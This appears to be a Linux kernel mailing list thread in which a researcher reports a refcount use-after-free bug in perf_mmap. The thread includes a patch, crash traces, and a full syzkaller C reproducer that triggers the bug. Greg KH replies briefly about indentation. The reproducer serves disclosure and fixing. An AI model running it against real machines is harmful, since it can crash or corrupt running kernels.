mapped(event, vma->vm_mm); + + /* + * Try to map it into the page table. On fail, invoke + * perf_mmap_close() to undo the above, as the callsite expects + * full cleanup in this case and therefore does not invoke + * vmops::close(). + */ + ret = map_range(event->rb, vma); + if (ret) + perf_mmap_close(vma); + } return ret; } -- 2.51.0 Request ------- Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID. Best regards, Haocheng Yu Zhejiang UniversitySyzkaller hit 'WARNING: refcount bug in perf_mmap' bug. audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff8881036bf678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000 RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000 R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0 FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0 PKRU: 55555554 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f4a5add3b9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000 RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0 </TASK> ---[ end trace 0000000000000000 ]--- Syzkaller reproducer: # {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}} pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff) r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8) mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0) r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2) mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0) C reproducer: // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include <endian.h> #include <setjmp.h> #include <signal.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> #ifndef __NR_pkey_mprotect #define __NR_pkey_mprotect 329 #endif static __thread int clone_ongoing; static __thread int skip_segv; static __thread jmp_buf segv_env; static void segv_handler(int sig, siginfo_t* info, void* ctx) { if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) { exit(sig); } uintptr_t addr = (uintptr_t)info->si_addr; const uintptr_t prog_start = 1 << 20; const uintptr_t prog_end = 100 << 20; int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0; int valid = addr < prog_start || addr > prog_end; if (skip && valid) { _longjmp(segv_env, 1); } exit(sig); } static void install_segv_handler(void) { struct sigaction sa; memset(&sa, 0, sizeof(sa)); sa.sa_handler = SIG_IGN; syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8); syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8); memset(&sa, 0, sizeof(sa)); sa.sa_sigaction = segv_handler; sa.sa_flags = SA_NODEFER | SA_SIGINFO; sigaction(SIGSEGV, &sa, NULL); sigaction(SIGBUS, &sa, NULL); } #define NONFAILING(...) \ ({ \ int ok = 1; \ __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \ if (_setjmp(segv_env) == 0) { \ __VA_ARGS__; \ } else \ ok = 0; \ __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \ ok; \ }) #define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) #define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \ *(type*)(addr) = \ htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \ (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); const char* reason; (void)reason; install_segv_handler(); intptr_t res = 0; if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } // pkey_mprotect arguments: [ // addr: VMA[0x2000] // len: len = 0x2000 (8 bytes) // prot: mmap_prot = 0x5 (8 bytes) // key: pkey (resource) // ] syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul, /*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x8 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/(intptr_t)-1, /*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul); if (res != -1) r[0] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x0 (8 bytes) // flags: mmap_flags = 0x11 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x2 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul); if (res != -1) r[1] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x100000b (8 bytes) // flags: mmap_flags = 0x13 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul, /*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul, /*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1], /*offset=*/0ul); return 0; }
On Sun, Feb 01, 2026 at 07:34:36PM +0800, Haocheng Yu wrote: This indentation looks very odd, are you sure it is correct? thanks, greg k-h
{ "author": "Greg KH <gregkh@linuxfoundation.org>", "date": "Sun, 1 Feb 2026 12:49:11 +0100", "thread_id": "20260202162057.7237-1-yuhaocheng035@gmail.com.mbox.gz" }
lkml
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
Hello, I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed. Summary ------- A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero. The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later. I verified this on Linux kernel version 6.18.5. Environment ----------- - Kernel version: 6.18.5 (the complete config is attached) - Architecture: x86_64 - Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1) Symptoms and logs ----------------- The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning The full report is as below: audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff888103c17678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff888107641190 RCX: 